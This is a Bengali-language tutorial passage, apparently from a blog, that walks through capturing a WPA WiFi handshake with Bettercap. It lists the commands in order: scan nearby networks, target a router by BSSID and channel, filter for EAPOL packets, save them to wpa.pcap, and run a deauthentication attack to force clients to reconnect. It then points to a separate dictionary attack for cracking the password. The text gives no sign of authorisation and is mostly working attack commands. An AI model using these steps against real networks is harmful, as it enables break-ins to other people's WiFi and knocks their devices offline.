এই পদ্ধতিতে আলাদাভাবে সিস্টেমের ওয়াইফাই ইন্টারফেসকে Monitor Mode করতে কমান্ড দেয়ার কোন প্রয়োজন নেই। কেননা, এই টুলসটি অটোভাবে কমান্ডের মাধ্যমে Monitor Mode করে নেবে। Bettercap টুলসটি রান করতে কমান্ড দিনঃ bettercap -iface wlan0 এবং এন্টার প্রেস করুন।

উক্ত টুলস দ্বারা কি কি কাজ করতে পারবেন, তা জানতে কমান্ড দিনঃ help এবং এন্টার প্রেস করুন।

নিচের পিকচারে দেখতে পাচ্ছেন যে, wifi > not running অর্থাৎ আপনার সিস্টেমের ওয়াইফাই বন্ধ আছে। এখন ওয়াই রান করতে কমান্ড দিনঃ wifi.recon on এবং এন্টার প্রেস করুন।

আপনার আশপাশের ওয়াইফাই নেটওয়ার্ক স্ক্যান করতে কমান্ড দিনঃ wifi.show এবং এন্টার প্রেস করুন। তাহলে নিচের পিকচারের মতো ওয়াইফাই লিস্ট দেখতে পাবেন। আমি সর্বপ্রথম যে রাউটারের ম্যাক এ্যাড্রেস রয়েছে, সেটাই টার্গেট করলাম। যার BSSID : e0:8e:3c:14:10:60 এবং চ্যানেল নাম্বার 3 এবং উক্ত রাউটারে ১টি ক্লায়েন্টস যুক্ত রয়েছে। হ্যান্ডসেক ক্যাপচারের জন্য রাউটারে নূন্যতম একটি ক্লায়েন্ট যুক্ত থাকা বাধ্যতামূলক।

এবার ধারাবাহিক ভাবে আপনার টার্গেট রাউটারের ইনফরমেশন প্রদান করুন নিচের পিকচারের কমান্ড ফলো করুন।

Bettercap-এ চ্যানেল সেট করার জন্য কমান্ডঃ set wifi.recon.channel 3 এবং এন্টার প্রেস করুন।

দ্বিতীয় কমান্ডঃ set net.sniff.verbose true

তৃতীয় কমান্ডঃ set net.sniff.filter ether proto 0x888e

হ্যান্ডসেক ক্যাপচারের জন্য কমান্ডঃ set net.sniff.output wpa.pcap

স্নাইপিং স্টার্ট করার জন্য কমান্ডঃ net.sniff on

এবার, ডিঅথেনটিকেশন এ্যাটাকের জন্য কমান্ড দিনঃ wifi.deauth e0:8e:3c:14:10:60 এবং এন্টার প্রেস করুন।

যখন হ্যান্ডসেক ক্যাপচার হয়ে যাবে, তখন নিচের পিকচারের মতো দেখাবে। এখন আপনি টুলসটি বন্ধ করতে কমান্ড দিনঃ exit এবং এন্টার প্রেস করুন।

হ্যান্ডসেক ক্যাপচার হওয়া ফাইলটি wpa.pcap নামে সেভ হয়েছে। আপনার লিনাক্স সিস্টেমের ফোল্ডার ওপেন করে দেখুন, নয়তো টার্মিনালে কমান্ড দিনঃ ls এবং এন্টার প্রেস করুন। এখন উক্ত ক্যাপচার হওয়া ফাইলটিতে ডিকশনারি এ্যাটাকের মাধ্যমে পাসওয়ার্ড ক্র্যাক করতে হবে, যা Airmon-ng হ্যাকিং প্রসেসে আলোচিত হয়েছে।

0
Would love your thoughts, please comment.x
()
x